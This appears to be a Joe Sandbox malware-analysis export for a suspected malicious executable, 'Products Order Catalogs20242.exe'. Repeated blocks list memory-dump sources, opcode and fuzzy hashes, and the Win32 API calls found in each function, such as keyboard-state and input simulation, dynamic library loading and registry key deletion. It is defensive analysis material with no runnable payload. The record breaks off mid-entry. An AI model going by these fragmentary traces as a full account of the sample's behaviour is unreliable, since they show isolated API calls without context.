                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: CurrentHandleProcess$Duplicate
                                                                                                • String ID: nul
                                                                                                • API String ID: 2124370227-2873401336
                                                                                                • Opcode ID: 1c1504a6ed80816e8cc684f5e798812a6452e5ed6eae5ac994518d836d8835bd
                                                                                                • Instruction ID: 183321404fa0000a7fb955016a75d3ae5bd0bbc3c7f5d4043dd6f74a8503dfc6
                                                                                                • Opcode Fuzzy Hash: 1c1504a6ed80816e8cc684f5e798812a6452e5ed6eae5ac994518d836d8835bd
                                                                                                • Instruction Fuzzy Hash: 4E2182701002019BE210DF28DC45F9BB7E4AF54B34F204A1EF9E4962D0E7759654CB56
                                                                                                APIs
                                                                                                • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00441333
                                                                                                • LoadLibraryW.KERNEL32(?,?,?,?,0047B4D0,?,?,?,?,?,?,?,?,?,00000000), ref: 0044133A
                                                                                                • SendMessageW.USER32(?,00000467,00000000,?), ref: 00441352
                                                                                                • DestroyWindow.USER32(00000000,?,00000467,00000000,?,?,?,?,0047B4D0,?,?,?,?,?,?), ref: 0044135B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                                                • String ID: SysAnimate32
                                                                                                • API String ID: 3529120543-1011021900
                                                                                                • Opcode ID: 7eb070968e116bc4f0d30e0eba70c7f8d943bdaa5f5f9b6b4db71aa758301bcd
                                                                                                • Instruction ID: 28effd0bdeb99d0e0a50349a2d6ccdc4655b9339127a2247ff1827a793b197f6
                                                                                                • Opcode Fuzzy Hash: 7eb070968e116bc4f0d30e0eba70c7f8d943bdaa5f5f9b6b4db71aa758301bcd
                                                                                                • Instruction Fuzzy Hash: D0216271204301ABF7209AA5DC84F6B73ECEBD9724F104A1EF651D72E0D6B4DC818729
                                                                                                APIs
                                                                                                • PeekMessageW.USER32(00000000,00000000,00000000,00000000,00000001), ref: 0044304E
                                                                                                • TranslateMessage.USER32(?), ref: 0044308B
                                                                                                • DispatchMessageW.USER32(?), ref: 00443096
                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004430AD
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: Message$Peek$DispatchTranslate
                                                                                                • String ID: *.*
                                                                                                • API String ID: 1795658109-438819550
                                                                                                • Opcode ID: a5394e60fa5dc12563cec3cf09e66162f870e5be06c650d2d1f2ad27f88770fd
                                                                                                • Instruction ID: a39ada88e739a490af96418dc0f35d82e94fc94c1e76e22fe960a83301852fb1
                                                                                                • Opcode Fuzzy Hash: a5394e60fa5dc12563cec3cf09e66162f870e5be06c650d2d1f2ad27f88770fd
                                                                                                • Instruction Fuzzy Hash: 9F2138715183419EF720DF289C80FA3B7949B60B05F008ABFF66492191E6B99608C76E
                                                                                                APIs
                                                                                                  • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                  • Part of subcall function 004389A1: SendMessageTimeoutW.USER32(00000001,00000000,00000000,00000000,00000002,00001388,004848E8), ref: 004389C0
                                                                                                  • Part of subcall function 004389A1: GetWindowThreadProcessId.USER32(00000001,00000000), ref: 004389D3
                                                                                                  • Part of subcall function 004389A1: GetCurrentThreadId.KERNEL32 ref: 004389DA
                                                                                                  • Part of subcall function 004389A1: AttachThreadInput.USER32(00000000), ref: 004389E1
                                                                                                • GetFocus.USER32 ref: 004609EF
                                                                                                  • Part of subcall function 004389EB: GetParent.USER32(?), ref: 004389F7
                                                                                                  • Part of subcall function 004389EB: GetParent.USER32(?), ref: 00438A04
                                                                                                • GetClassNameW.USER32(?,?,00000100), ref: 00460A37
                                                                                                • EnumChildWindows.USER32(?,00445A31,?), ref: 00460A60
                                                                                                • __swprintf.LIBCMT ref: 00460A7A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_wcslen
                                                                                                • String ID: %s%d
                                                                                                • API String ID: 991886796-1110647743
                                                                                                • Opcode ID: 4a64ff5b06e5e341b473abb9bc2bdd7182ed8da111ba9effa567358a3114916c
                                                                                                • Instruction ID: 20a4aa43144560c0524e92d1094e5dcb4402c89d1d481f65a72662ac57dae138
                                                                                                • Opcode Fuzzy Hash: 4a64ff5b06e5e341b473abb9bc2bdd7182ed8da111ba9effa567358a3114916c
                                                                                                • Instruction Fuzzy Hash: 7521A4712403046BD610FB65DC8AFEFB7ACAF98704F00481FF559A7181EAB8A509877A
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: _memset$_sprintf
                                                                                                • String ID: %02X
                                                                                                • API String ID: 891462717-436463671
                                                                                                • Opcode ID: 3d61b25fa3990800e5a694d7793c27d494b4b6e65897825e99c1223689708875
                                                                                                • Instruction ID: c3235ccac5cd273424cb9b73a8b9e0f10e05fa8943de770f4571b5c3e9b76774
                                                                                                • Opcode Fuzzy Hash: 3d61b25fa3990800e5a694d7793c27d494b4b6e65897825e99c1223689708875
                                                                                                • Instruction Fuzzy Hash: 5B11E97225021167D314FA698C93BEE724CAB45704F50453FF541A75C1EF6CB558839E
                                                                                                APIs
                                                                                                • _memset.LIBCMT ref: 0042CD00
                                                                                                • GetOpenFileNameW.COMDLG32 ref: 0042CD51
                                                                                                  • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\Products Order Catalogs20242.exe,?,C:\Users\user\Desktop\Products Order Catalogs20242.exe,004A8E80,C:\Users\user\Desktop\Products Order Catalogs20242.exe,0040F3D2), ref: 0040FFCA
                                                                                                  • Part of subcall function 00410130: SHGetMalloc.SHELL32(00000000), ref: 0041013A
                                                                                                  • Part of subcall function 00410130: SHGetDesktopFolder.SHELL32(?,004A8E80), ref: 00410150
                                                                                                  • Part of subcall function 00410130: _wcscpy.LIBCMT ref: 00410160
                                                                                                  • Part of subcall function 00410130: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410197
                                                                                                  • Part of subcall function 00410130: _wcscpy.LIBCMT ref: 004101AC
                                                                                                  • Part of subcall function 00410020: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 00410037
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: NamePath$Full_wcscpy$DesktopFileFolderFromListMallocOpen_memset
                                                                                                • String ID: $OH$@OH$X
                                                                                                • API String ID: 3491138722-1394974532
                                                                                                • Opcode ID: b307b7495d9e484b77ad3edce91dc90ef7c994e26f1a80758083a935cdf7c966
                                                                                                • Instruction ID: e3e81f3fa603e1d093c5df9e9287f390c0398a0e5563e0e16fb911f44c5f658a
                                                                                                • Opcode Fuzzy Hash: b307b7495d9e484b77ad3edce91dc90ef7c994e26f1a80758083a935cdf7c966
                                                                                                • Instruction Fuzzy Hash: 2111C2B02043405BC311EF19984175FBBE9AFD5308F14882EF68497292D7FD854DCB9A
                                                                                                APIs
                                                                                                • LoadLibraryW.KERNEL32(00000000), ref: 00463DD1
                                                                                                • GetProcAddress.KERNEL32(?,?), ref: 00463E68
                                                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 00463E84
                                                                                                • GetProcAddress.KERNEL32(?,?), ref: 00463ECE
                                                                                                • FreeLibrary.KERNEL32(?,?,?,00000000,?), ref: 00463EF0
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: AddressProc$Library$FreeLoad
                                                                                                • String ID:
                                                                                                • API String ID: 2449869053-0
                                                                                                • Opcode ID: fa0419033c450d646a7a4ef883371915f5dff59722895d189eba4af2447b2958
                                                                                                • Instruction ID: 5a5949aabc30296464acd143044f95cbdcafad8a77d2d24e7d672d776762960f
                                                                                                • Opcode Fuzzy Hash: fa0419033c450d646a7a4ef883371915f5dff59722895d189eba4af2447b2958
                                                                                                • Instruction Fuzzy Hash: 9051C1752043409FC300EF25C881A5BB7A4FF89305F00456EF945A73A2DB79EE45CBAA
                                                                                                APIs
                                                                                                • GetKeyboardState.USER32(?,?,00000001,00000001,?,00000000), ref: 0044C3DA
                                                                                                • SetKeyboardState.USER32(00000080), ref: 0044C3ED
                                                                                                • PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C441
                                                                                                • PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C465
                                                                                                • SendInput.USER32 ref: 0044C509
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: KeyboardMessagePostState$InputSend
                                                                                                • String ID:
                                                                                                • API String ID: 3031425849-0
                                                                                                • Opcode ID: b49b686b41cf8e4dc8898cf8a112ca1a8544ab09a95107e5a7613c5accf95fc9
                                                                                                • Instruction ID: f46f63d78903415e516a46676784f6fcea1caa301ceb581e17347d916cd8316d
                                                                                                • Opcode Fuzzy Hash: b49b686b41cf8e4dc8898cf8a112ca1a8544ab09a95107e5a7613c5accf95fc9
                                                                                                • Instruction Fuzzy Hash: DB413B715462446FF760AB24D944BBFBB94AF99324F04061FF9D4122C2D37D9908C77A
                                                                                                APIs
                                                                                                • RegEnumKeyExW.ADVAPI32 ref: 004422F0
                                                                                                • RegOpenKeyExW.ADVAPI32(?,00000000,00000000,?,?), ref: 0044232B
                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 0044234E
                                                                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00442390
                                                                                                • RegEnumKeyExW.ADVAPI32(?,00000000), ref: 004423C0
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: Enum$CloseDeleteOpen
                                                                                                • String ID:
                                                                                                • API String ID: 2095303065-0
                                                                                                • Opcode ID: 367b6e42355be36f427f5e4c5f923650598af64a8eac08207e4f2af605b886a1
                                                                                                • Instruction ID: 24d8057b763805d248a02a33893b377b1579bd56aab3fff97e90bb3d062a49ad
                                                                                                • Opcode Fuzzy Hash: 367b6e42355be36f427f5e4c5f923650598af64a8eac08207e4f2af605b886a1
                                                                                                • Instruction Fuzzy Hash: 0C3150721043056EE210DF94DD84FBF73ECEBC9314F44492EBA9596141D7B8E9098B6A
                                                                                                APIs
                                                                                                • GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C2F4
                                                                                                • GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C31B
                                                                                                • WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C363
                                                                                                • WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C385
                                                                                                • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C392
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: PrivateProfile$SectionWrite$String
                                                                                                • String ID:
                                                                                                • API String ID: 2832842796-0
                                                                                                • Opcode ID: c76cc1094b5fb1fc43fcb7877a7661b5ae667b5fa7796de5023eb6f45200691f
                                                                                                • Instruction ID: eb365ed5c03c4bb3a44f9ddbc5128f2f56e5f8affd5b6ace934fe40af23b551f
                                                                                                • Opcode Fuzzy Hash: c76cc1094b5fb1fc43fcb7877a7661b5ae667b5fa7796de5023eb6f45200691f
                                                                                                • Instruction Fuzzy Hash: 00318675240305ABD610DFA1DC85F9BB3A8AF84705F00891DF94497292D7B9E889CB94
                                                                                                APIs
                                                                                                • GetClientRect.USER32(?,?), ref: 00447997
                                                                                                • GetCursorPos.USER32(?), ref: 004479A2
                                                                                                • ScreenToClient.USER32(?,?), ref: 004479BE
                                                                                                • WindowFromPoint.USER32(?,?), ref: 004479FF
                                                                                                • DefDlgProcW.USER32(?,00000020,?,?), ref: 00447A78
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: Client$CursorFromPointProcRectScreenWindow
                                                                                                • String ID:
                                                                                                • API String ID: 1822080540-0
                                                                                                • Opcode ID: c356f0f93048ebf3c0a873f2be17aa192b5fb9472fb724aa4a6a449873fe30ba
                                                                                                • Instruction ID: e9c1e18ea4fcc9a2ad4b32cd349e8b57ec7287094a91df3c43d19f1875151664
                                                                                                • Opcode Fuzzy Hash: c356f0f93048ebf3c0a873f2be17aa192b5fb9472fb724aa4a6a449873fe30ba
                                                                                                • Instruction Fuzzy Hash: DE3188742082029BD710CF19D88596FB7A9EBC8714F144A1EF88097291D778EA57CBAA
                                                                                                APIs
                                                                                                • GetWindowRect.USER32(?,?), ref: 00447C1B
                                                                                                • ScreenToClient.USER32(?,?), ref: 00447C39
                                                                                                • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C4C
                                                                                                • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447C93
                                                                                                • EndPaint.USER32(?,?), ref: 00447CD1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: ClientPaintRectRectangleScreenViewportWindow
                                                                                                • String ID:
                                                                                                • API String ID: 659298297-0
                                                                                                • Opcode ID: a6d698a2242c6caf7091173c4181dadfabb51550506680b35635a03376f271bc
                                                                                                • Instruction ID: 653bb342b0117225c29b14224c0e663a7b864e912777eddc33bb147bcfad3e12
                                                                                                • Opcode Fuzzy Hash: a6d698a2242c6caf7091173c4181dadfabb51550506680b35635a03376f271bc
                                                                                                • Instruction Fuzzy Hash: 8A3150706043019FE320CF15D9C8F7B7BE8EB89724F044A6EF994873A1D774A8468B69
                                                                                                APIs
                                                                                                • GetCursorPos.USER32(?), ref: 004478A7
                                                                                                • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478C3
                                                                                                • DefDlgProcW.USER32(?,0000007B,?,?,004A83D8,?,004A83D8,?), ref: 004478E7
                                                                                                • GetCursorPos.USER32(?), ref: 00447935
                                                                                                • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 0044795B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: CursorMenuPopupTrack$Proc
                                                                                                • String ID:
                                                                                                • API String ID: 1300944170-0
                                                                                                • Opcode ID: 00aabaf84d80e4f8c92fc7d2a6c816b999107077810d41e1d32a7af9c3da8c6b
                                                                                                • Instruction ID: 600148c7f6f0e64f7aba5c2d0a58757112576a5c49d56a392ea253be37485a5b
                                                                                                • Opcode Fuzzy Hash: 00aabaf84d80e4f8c92fc7d2a6c816b999107077810d41e1d32a7af9c3da8c6b
                                                                                                • Instruction Fuzzy Hash: 2B31E475244204ABE214DB48DC48FABB7A5FBC9711F14491EF64483390D7B96C4BC779
                                                                                                APIs
                                                                                                • EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
                                                                                                • EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
                                                                                                • ShowWindow.USER32(004A83D8,00000000,004A83D8,?,?), ref: 00448C37
                                                                                                • ShowWindow.USER32(004A83D8,00000004,004A83D8), ref: 00448C43
                                                                                                • EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
                                                                                                  • Part of subcall function 004413F0: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 0044140E
                                                                                                  • Part of subcall function 004413F0: GetWindowLongW.USER32(?,000000F0), ref: 00441452
                                                                                                  • Part of subcall function 004413F0: GetWindowLongW.USER32(?,000000F0), ref: 00441493
                                                                                                  • Part of subcall function 004413F0: SendMessageW.USER32(019A1BB8,000000F1,00000000,00000000), ref: 004414C6
                                                                                                  • Part of subcall function 004413F0: SendMessageW.USER32(019A1BB8,000000F1,00000001,00000000), ref: 004414F1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$EnableMessageSend$LongShow
                                                                                                • String ID:
                                                                                                • API String ID: 142311417-0
                                                                                                • Opcode ID: 63a7105258867651d9446b65671e60b54e1f680e017c4d0f27b0fbeeb6060130
                                                                                                • Instruction ID: 53ead31d82dc60d0a1ec6489c26700cf05fac79e8a5bf65a12bf69c5108a1aee
                                                                                                • Opcode Fuzzy Hash: 63a7105258867651d9446b65671e60b54e1f680e017c4d0f27b0fbeeb6060130
                                                                                                • Instruction Fuzzy Hash: 942105B07053809BF7148E28C8C47AFB7D0FB95345F08482EF981A6391DBAC9845C72E
                                                                                                APIs
                                                                                                • _memset.LIBCMT ref: 0044955A
                                                                                                  • Part of subcall function 00433A98: _wcspbrk.LIBCMT ref: 00433AAC
                                                                                                • SendMessageW.USER32(?,00001060,00000000,00000004), ref: 004495B3
                                                                                                • _wcslen.LIBCMT ref: 004495C1
                                                                                                • _wcslen.LIBCMT ref: 004495CE
                                                                                                • SendMessageW.USER32(?,00001060,00000000,?), ref: 004495FF
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend_wcslen$_memset_wcspbrk
                                                                                                • String ID:
                                                                                                • API String ID: 1843234404-0
                                                                                                • Opcode ID: b21334e59b332bdcefcacb45badc01962a29afe58654cc2f886ab9dc01dd4065
                                                                                                • Instruction ID: 2eba0e6ca7bf2f01d6f4dc0284c8cedbdf4c7ea0b5caad0642d64795040b3bc6
                                                                                                • Opcode Fuzzy Hash: b21334e59b332bdcefcacb45badc01962a29afe58654cc2f886ab9dc01dd4065
